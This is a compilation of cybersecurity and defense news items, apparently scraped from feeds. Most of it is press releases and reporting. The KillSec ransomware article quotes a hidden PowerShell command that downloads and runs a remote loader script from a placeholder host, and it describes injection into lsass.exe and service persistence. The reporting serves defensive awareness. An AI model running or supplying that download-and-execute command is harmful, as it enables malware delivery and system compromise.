-
Cybersecurity researchers have disclosed multiple critical security vulnerabilities in Chaos Mesh that, if successfully exploited, could lead to cluster takeover in Kubernetes environments. “Attackers need only minimal in-cluster network access to exploit these vulnerabilities, execute the platform’s fault injections (such as shutting down pods or disrupting network communications), and perform
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Seraphic today announced at Fal.Con 2025 that its Secure Enterprise Browser (SEB) solution is now available for purchase in the CrowdStrike Marketplace, a one-stop destination for the world-class ecosystem of CrowdStrike-compatible security products. This availability enables customers to discover, buy, and implement Seraphic’s browser-native protection directly within the CrowdStrike Falcon platform. With this release, Seraphic […]
The post Las Vegas, United States, September 16th, 2025, CyberNewsWire appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Las Vegas, United States, September 16th, 2025, CyberNewsWire
Seraphic today announced at Fal.Con 2025 that its Secure Enterprise Browser (SEB) solution is now available for purchase in the CrowdStrike Marketplace, a one-stop destination for the world-class ecosystem of CrowdStrike-compatible security products.
This availability enables customers to discover, buy, and implement Seraphic’s browser-native protection directly within the CrowdStrike Falcon platform.
With this release, Seraphic delivers a CrowdStrike Falcon Next-Gen SIEM integration that correlates Seraphic’s browser-layer telemetry with CrowdStrike threat intelligence and analytics. Adversaries are moving at the speed of AI, scaling attacks faster than defenders can respond.
Legacy SIEMs, built for a different era, are too slow, noisy, and costly to stop today’s threats. Falcon Next-Gen SIEM delivers real-time speed, efficiency, and outcomes legacy platforms can’t match – now extended to the browser layer.
Joint customers gain unified visibility into browser activity, risky extensions, and user behaviors, empowering faster detection, investigation, and response to advanced threats.
“As organizations increasingly rely on cloud services, SaaS applications and AI-powered applications, the browser has become both the primary workspace for productivity and a critical target for cyberattacks,” said Iulia Stefoi-Silver, VP, Global Partnerships and Alliances at Seraphic.
“Traditional security solutions often overlook this layer, leaving gaps that can be exploited through zero-days, phishing, and data loss. By integrating with the Falcon platform and becoming available in the CrowdStrike Marketplace, joint customers can easily transform any browser into a secure enterprise browser.”
Jeff Farinich, CISO at New American Funding added: “Integrating Seraphic with the CrowdStrike Falcon platform has given our security team continuous visibility and control at the browser layer, without impacting user productivity.”“Browsers have become one of the most targeted and overlooked attack surfaces in the enterprise,” said Daniel Bernard, Chief Business Officer at CrowdStrike.
“By bringing Seraphic into Falcon Next-Gen SIEM, we’re closing that gap with real-time visibility and intelligence. Together, we’re giving customers faster detection, better outcomes, and the ability to stop threats at the browser layer that legacy SIEMs would miss.”
The Seraphic integration with the CrowdStrike Falcon platform is available for purchase in the CrowdStrike Marketplace. Learn more at Marketplace and start your free Browser Assessment with one click.
Visit Seraphic at Fal.Con Booth #1923 to see live demos, meet our experts, and learn how to protect your workforce.
About Seraphic
Seraphic is a leader in the rapidly growing Enterprise Browser Security market, powered by innovative technology that transforms any browser into a secure workspace with robust protection and detection capabilities.
Seamlessly deployed, Seraphic enables secure access to SaaS and private web applications for employees and third parties on both managed and personal devices.
Invisible to the end user, it supports all browsers and SaaS desktop applications such as Teams, Slack, Discord, WhatsApp and many more.
Recognized with the Frost & Sullivan Global Zero Trust Enabling Technology Leadership Award, backed by investors including CrowdStrike Falcon Fund, Planven, Cota Capital, Storm Ventures, Eastlink, and Secure Octane, and trusted by Fortune 500 companies, Seraphic secures the enterprise browser for today’s modern, cloud-driven businesses. For more information, visit www.seraphicsecurity.com.
Contact
Head of Communications
Eric Wolkstein
Seraphic
ericw@seraphicsecurity.comThe post Seraphic Browser-Native Protection Now Available for Purchase on the CrowdStrike Marketplace appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Security Operations Centers (SOCs) exist under ever-increasing pressure to detect and respond to threats before they escalate.
Today’s fast-moving adversaries exploit gaps in threat visibility with automation, targeted ransomware, and zero-day exploits. The result? Severe operational disruptions, financial losses, and reputational harm.
Lessons from Recent Cyber Disruptions
These recent high-impact incidents show why SOCs need real-time threat intelligence and top-notch sources of threat data, not just reactive guidance.
Jaguar Land Rover (JLR)
A cyberattack this September halted manufacturing at Solihull and Merseyside plants and disrupted retail operations, forcing a global systems shutdown during peak registration periods. Although customer data remained intact, the operational fallout was significant
How real-time TI could help: Early detection of attacker tools (e.g. ransomware variants from groups like Scattered Spider) could enable immediate network segmentation, containment, and threat blocking—minimizing factory downtime and retail impact.
Marks & Spencer (M&S)
In a sophisticated cyberattack earlier this year, M&S estimated a $400 million loss in operating profit. Online orders were suspended for up to six weeks, food availability plunged, waste increased, and logistics costs soared .
Preventive potential of real-time TI: Rapid identification of attacker TTPs (e.g. contactless payment disruption methods) could empower SOCs to isolate systems, enforce manual overrides, and protect critical supply-chain operations in real time.
Co-op (UK)
A cyber-disruption forced manual scanning, empty shelves, and data exposure of 6.2 million customers. In response, Co-op launched a customer “thank-you” campaign to regain trust
Real-time advantage: Early intelligence on phishing or infostealer activity could trigger preventive alerts, protect backend systems, and avert both operational disruption and consumer trust erosion.
Lee Enterprises (Media)
In February 2025, ransomware group Qilin encrypted files and exfiltrated 350 GB from 75 local newspapers, disrupting both print and digital workflows
Timely TI value: Real-time insights on ransomware-associated IOC patterns could activate automated shutdowns or safe-mode transitions by minimizing downtime in critical media delivery operations.
Forward-thinking organizations recognize that real-time threat intelligence transforms their SOC from a cost center into a competitive advantage.
Building SOC Capabilities That Scale
The most efficient SOCs don’t just consume threat intelligence: they integrate it into automated response workflows. Real-time feeds enable dynamic policy updates, automatic quarantine decisions, and intelligent alert prioritization.
ANY.RUN’s Threat Intelligence Feeds exemplify this approach by providing not just indicators, but actionable intelligence with immediate context.
Cut MTTR, downtime, and breach losses with real-time threat intelligence : Contact ANY.RUN to get access to actionable IOCs
They fuel security systems with malicious IPs, domains, URLs extracted from live sandbox analyses of the latest threats hitting 15,000+ organizations worldwide:
Key Business Gains from Real-Time Threat Intelligence
The impact isn’t theoretical — it’s transformational:
- Minimized operational disruption: Act immediately on emerging threats, containing them before escalation.
- Visible ROI: Reduced MTTR (Mean Time to Respond) and business interruption protect revenue and reputation.
- Efficient resource use: Analysts focus efforts on validated real threats instead of sifting through stale or irrelevant alerts.
- Resilience and trust: Strengthen business continuity and stakeholder confidence, even under attack.
ANY.RUN’s TI Feeds Benefit Business Impact Real-time detection Reduce downtime (avoiding multi-million disruptions) Faster response Contain threats before escalation Resource efficiency Fewer alerts, more focus Proactive protection Prevent repetitive breaches across sectors Enhanced KPI performance Better MTTR, stronger SLAs, business continuity Conclusion: Turning Threat Data into Business Resilience
The recent disruptions across industries prove a simple truth: cyberattacks are not just IT problems. They are business problems with a direct impact on revenue, operations, and reputation.
For executives, the cost of relying on delayed or incomplete intelligence is measured not only in lost profits, but also in eroded customer trust and weakened competitive advantage.
Real-time threat intelligence transforms this equation. By arming SOCs with live, verified insights from global attack activity, leaders can ensure faster detection, sharper response, and stronger resilience against even the most advanced threats.
With ANY.RUN’s Threat Intelligence Feeds, organizations and MSSPs move from reactive defense to proactive protection: minimizing risk, optimizing security investments, and securing business continuity in an unpredictable digital landscape.
The post Why Real-Time Threat Intelligence Is Critical for Modern SOCs appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
·
Another deadly boat strikePresident Trump ordered another attack on a boat in international waters, claiming that the strike killed three people who were “positively identified, extraordinarily violent drug trafficking cartels and narcoterrorists in the SOUTHCOM area of responsibility.” In his post, Trump shared a clip of an explosion but no evidence to back up his claims.
When reporters asked for proof, Trump replied, “We have proof. All you have to do is look at the cargo that was spattered all over the ocean — big bags of cocaine and fentanyl all over the place.”
Associated Press: “The Trump administration has justified the military action as a necessary escalation to stem the flow of drugs into the United States. But several senators, Democrats and some Republicans, have questioned the legality of Trump’s action. They view it as a potential overreach of executive authority in part because the military was used for law enforcement purposes.” More, here.
Some forces are being staged at Puerto Rico’s José Aponte de la Torre Airport—or as old Navy hands know it, the former Naval Station Roosevelt Roads. The War Zone has a look at the military’s new use of a facility declared surplus more than two decades ago.
Welcome to this Tuesday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1944, Navy Lt. Arthur Preston led a pair of plywood PT boats into a Japanese-held harbor in Indonesia to rescue a downed pilot—an action so daring that Preston received the Medal of Honor for it.
Israel pushes into Gaza City
After weeks of buildup, Israeli forces moved into Gaza’s largest city on Tuesday night. New York Times: “Hundreds of thousands of people remained in the city with hardly anywhere to go. Israel said the ground operation, after nearly two years of war, was needed to keep Hamas militants from regrouping…Palestinians in Gaza City described scenes of panic as Israel pounded the area with heavy airstrikes, and local health officials said that more than 20 people had been killed and dozens more wounded.” More, here.
Russian drones
A new NATO quick-response effort got its first test: an air intercept of a Russian drone in Romanian airspace, officials said in a Monday press release. On Friday, a Rafale jet and a Polish helicopter were scrambled to intercept the drone, marking the first action of the alliance’s Eastern Sentry activity.
Eastern Sentry was unveiled earlier on Friday by U.S. Air Force Gen. Alexus Grynkewich, Supreme Allied Commander Europe, who described it as a response to Poland’s Sept. 9 downing of Russian drones in its airspace.
“Although the immediacy of our focus is on Poland, this situation transcends the borders of one nation. What affects one ally affects us all. This is an issue that impacts the entire Alliance, and we will treat it as such,” Grynkewich said.
Grynkewich said Britain, Denmark, France, and Germany had already deployed forces as part of the effort. He described the initiative as a “comprehensive and integrated approach” that goes beyond the case-by-case “individual air policing actions” of NATO’s previous air-defense posture.
It’s about more than air defense, an alliance official told Defense One’s Patrick Tucker on background. The official said Grynkewich met Monday with all of his domain commanders, adding: “It doesn’t just impact Allied Air Command, and it doesn’t just impact Allied Joint Force Command Brunssum, which leads integrated land command. We’re looking at this holistically along the eastern front.” Read on, here.
Such incursions reveal new asymmetric-war tactics—and the U.S. isn’t ready, argue Mick Ryan and Peter Singer in the Washington Post. “The U.S. homeland remains profoundly vulnerable to similar surprises. The looming wave of smarter drones, advanced AI and sophisticated 3D printing promises to redefine both the battlefield and how trickery is conducted upon it. And our main adversary, China, is investing heavily in these technologies while studying the lessons of Iran and Russia.” Read on, here.
And explore the duo’s past writing on similar themes for Defense One, here.
Meanwhile, companies are pitching anti-drone drones that ram or explode near incoming Shaheds. Fielding such interceptors is a priority for Ukraine, the director of the Ukrainian Defense Procurement Agency told Defense News at the DSEI trade show in London last week. Read on, here.
And the UK aims to have its own drone swarms within five years. UK Defense Journal, reporting on Tuesday: “Uncrewed systems will soon become a defining feature of the UK’s conventional forces, with Defence Minister Luke Pollard confirming that drones and unmanned ground vehicles (UGVs) will be fielded in high numbers over the next five years.” More, here.
Around the Pentagon
Army launches “venture capital”-type effort to boost innovation. “We’re really taking the approach where we’re going to deliberately make a large number of investments in emerging tech companies,” Matt Willis, the Army’s Fuze program director, told Defense News. The program brings together four funding streams: “XTech prize competitions, small-business funding, tech maturation and manufacturing technology — worth about $750 million in fiscal 2025,” Read more, here.
Will the Qatari 747 be less capable than Air Force One is supposed to be? The Air Force says work has begun on the gift to President Trump from Qatar’s rulers (who could be forgiven for wondering about its efficacy after the Sept. 9 Israeli airstrikes on their capital). Sharp-eyed Greg Hadley of Air & Space Forces magazine notes that the statement distributed Monday talks not about conversion for “presidential transport,” but “executive airlift”—which might imply a different set of requirements. Read, here.
ICYMI: The work—which Air Force leaders have said will cost some $400 million but others believe will consume more than $1 billion—is being funded with money once allocated to the Air Force’s over-budget Sentinel ICBM effort.
]]>¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
In today’s fast-paced software development world, where applications are released at an unprecedented rate, ensuring their security is more critical than ever. Dynamic Application Security Testing (DAST) has emerged as a fundamental practice for modern development teams. DAST tools, often referred to as “black box” scanners, test a running application from the outside, simulating the […]
The post Top 10 Best Dynamic Application Security Testing (DAST) Platforms in 2026 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A massive ad fraud and click fraud operation dubbed SlopAds ran a cluster of 224 apps, collectively attracting 38 million downloads across 228 countries and territories. “These apps deliver their fraud payload using steganography and create hidden WebViews to navigate to threat actor-owned cashout sites, generating fraudulent ad impressions and clicks,” HUMAN’s Satori Threat Intelligence and
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
The KillSec ransomware strain has rapidly emerged as a formidable threat targeting healthcare IT infrastructures across Latin America and beyond.
First observed in early September 2025, KillSec operators have leveraged compromised software supply chain relationships to deploy their payloads at scale.
Initial indicators of compromise were detected when several Brazilian healthcare providers reported unusual network traffic originating from cloud storage buckets.
Uncharacteristically, this group combines rudimentary exfiltration methods—such as open AWS S3 buckets—with sophisticated encryption routines, maximizing impact while minimizing initial intrusion complexity.
Resecurity analysts noted that KillSec’s entry point frequently involves unpatched web applications or misconfigured cloud storage, both common in healthcare environments undergoing rapid digital transformation.
Once inside, the malware propagates through internal networks via legitimate administrative protocols, including Windows Remote Management (WinRM) and Remote Desktop Protocol (RDP).
.webp)
Cyberattack on MedicSolution (Source – Resecurity) This lateral movement often remains undetected for days, giving the adversaries ample time to harvest sensitive medical records and personally identifiable information (PII).
The group’s data leak site on TOR has showcased high-profile exfiltrations, confirming their willingness to publicly shame victims to coerce ransom payments.
Following compromise, KillSec actors execute a multi-stage encryption process, using a lightweight loader that invokes a custom-built AES-256 encryption routine.
Resecurity researchers identified the loader by its unique import hashing and unusual manipulation of the
Advapi32.dlllibrary, suggesting purposeful evasion of antivirus heuristics.Their combined use of legitimate system APIs and self-developed cryptographic components makes traditional signature-based detection largely ineffective, highlighting the group’s growing technical sophistication.
Within a week of its appearance, KillSec has impacted over a dozen healthcare entities, exfiltrating more than 34 GB of data—including unredacted patient images, laboratory results, and records related to minors—before triggering ransomware demands.
The visible public leak of these files has prompted regulators to issue urgent breach notifications under Brazil’s LGPD framework.
Threat intelligence reports now warn that downstream clinics and labs using affected software could face secondary compromises if the compromised vendor’s code remains unsigned and unverified.
Infection Mechanism Deep Dive
A critical aspect of KillSec’s success lies in its dual-pronged infection mechanism, which combines opportunistic cloud bucket access with a fallback downloader embedded in common document formats.
Victims first encounter a deceptive PDF invoice file, masquerading as a billing statement from a known medical supplier.
This malformed PDF exploits a zero-day in the processing engine, triggering execution of a stealthy PowerShell one-liner:-
powershell -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString('hxxp://malicious.example.com/loader.ps1'))"Upon execution, this PowerShell stub retrieves an encoded payload, decodes it in memory, and uses reflective DLL injection to load the AES encryption engine directly into
lsass.exe.This inline injection bypasses disk-based detection and restricts forensic visibility to volatile memory.
The loader then enumerates network shares and scheduled tasks, creating persistence via a disguised Windows service named
WinLevelService. This service is configured to run under the SYSTEM account, ensuring execution at every reboot.By hiding its loader in benign-seeming documents and abusing cloud misconfigurations, KillSec ransomware operators maintain a high success rate against healthcare targets, underscoring the need for proactive cloud security posture management and rigorous document sanitization protocols.
Free live webinar on new malware tactics from our analysts! Learn advanced detection techniques -> Register for FreeThe post KillSec Ransomware Attacking Healthcare Industry IT Systems appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A pair of senators are concerned that Director of National Intelligence Tulsi Gabbard may have instructed spy agencies to stop disclosing intelligence on foreign adversaries’ attempts to undermine the integrity of U.S. elections and sway election outcomes through influence operations.
Sens. Mark Warner of Virginia and Alex Padilla of California, the top Democrats on the high chamber’s intelligence and rules committees, asked Gabbard in a Monday letter to schedule a briefing with senators by Oct. 10 to provide an assessment of planned steps the intelligence community is taking to protect the security of upcoming elections in November, as well as next year’s midterms.
They also asked Gabbard to clarify statements she’s made since taking office that appear to call into question the security of voting machines in the U.S. Those statements are “harmful and unsubstantiated,” the lawmakers wrote. Independent groups test voting platforms for vulnerabilities ahead of major elections, and past reviews show that claims about their poor technical controls stem largely from false narratives spread by foreign adversaries.
Major races this November include the New York City mayoral election, which has drawn national attention, as well as mayoral contests in Atlanta and Boston.
President Donald Trump and his GOP allies have long been suspicious of the U.S. intelligence community, particularly in light of its assessment that Russia aimed to sway the 2016 presidential election toward Trump. Multiple reviews, including a comprehensive, bipartisan Senate Intelligence Committee report, concluded that Russian President Vladimir Putin sought to help Trump win. Under Gabbard, the White House has sought to diminish such findings.
The administration has dismantled and shrunk offices that track influence operations, saying that their efforts to prevent the spread of false information about contentious topics, such the 2020 election and the COVID-19 pandemic, constituted censorship.
The election-security work of the Cybersecurity and Infrastructure Security Agency has also been reduced. Its former director publicly declared that the 2020 election was secure, undermining false claims from Trump that the election was rigged against him. He was then fired, and recently became a target of this new administration.
“We are concerned that you may have directed the Intelligence Community (IC) to cease its intelligence reporting on this vital topic,” Padilla and Warner wrote. “Since taking office, the administration paused CISA’s election security work, fired election security staff, and staff are reportedly afraid to work with state and local election officials and vendors for fear of retribution.”
In a statement to Nextgov/FCW, ODNI Press Secretary Olivia Coleman called the letter “factually wrong and an obvious effort to spread manufactured panic.”
“As we've said publicly on numerous occasions and as Congress has been told directly, all core functions and expertise to ensure the safety, security, and freedom of the American people, including operations to counter foreign and cyber election threats, have not and will not be affected by our ODNI 2.0 efforts,” Coleman said. “In fact, thanks to the dogged transparency and accountability efforts of DNI Gabbard, the IC has never been more prepared to address these threats.”
Using secret technical capabilities and resources, spy agencies can gather data on plans to influence Americans via social media or other subversive methods. Under former President Joe Biden, ODNI tracked and disseminated findings on influence operations launched by Russia, China, and other nations in the lead-up to the 2024 election.
Influence campaigns have improved greatly since 2016, largely through innovations in artificial intelligence tools. The Chinese government has enlisted a range of domestic AI firms to develop and run sophisticated propaganda campaigns that look far more lifelike than past public manipulation efforts, according to a cache of documents tied to one such company recently reviewed by Vanderbilt University researchers. The firm, GoLaxy, has built profiles on at least 117 sitting U.S. lawmakers and over 2,000 other American political and thought leaders.
]]>¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
RevengeHotels, also known as TA558, has escalated its long-standing cybercrime campaign by incorporating artificial intelligence into its infection chains, deploying the potent VenomRAT malware against Windows users. Active since 2015, this threat actor has traditionally targeted hotel guests and travelers, stealing payment card data through phishing emails. Recent campaigns, however, demonstrate a marked shift: AI-generated […]
The post Windows Users Hit by VenomRAT in AI-Driven RevengeHotels Attack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶


